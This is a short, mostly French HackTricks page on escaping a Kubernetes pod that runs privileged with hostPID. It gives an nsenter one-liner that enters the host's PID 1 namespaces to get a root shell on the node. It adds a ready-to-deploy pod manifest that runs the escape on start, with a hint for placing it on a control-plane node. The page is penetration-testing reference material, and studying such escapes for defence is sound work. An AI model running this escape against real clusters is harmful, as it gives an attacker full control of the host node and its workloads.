Pod Escape Privileges

Support HackTricks

Privilèges et hostPID

Avec ces privilèges, vous aurez accès aux processus des hôtes et suffisamment de privilèges pour entrer dans l'espace de noms de l'un des processus hôtes. Notez que vous n'aurez potentiellement pas besoin de privilèges, mais juste de certaines capacités et d'autres contournements de défenses potentielles (comme apparmor et/ou seccomp).

Il suffit d'exécuter quelque chose comme ce qui suit pour vous échapper du pod :

nsenter --target 1 --mount --uts --ipc --net --pid -- bash

Exemple de configuration :

apiVersion: v1
kind: Pod
metadata:
name: priv-and-hostpid-exec-pod
labels:
app: pentest
spec:
hostPID: true
containers:
- name: priv-and-hostpid-pod
image: ubuntu
tty: true
securityContext:
privileged: true
command: [ "nsenter", "--target", "1", "--mount", "--uts", "--ipc", "--net", "--pid", "--", "bash" ]
#nodeName: k8s-control-plane-node # Force your pod to run on the control-plane node by uncommenting this line and changing to a control-plane node name
Soutenir HackTricks

Last updated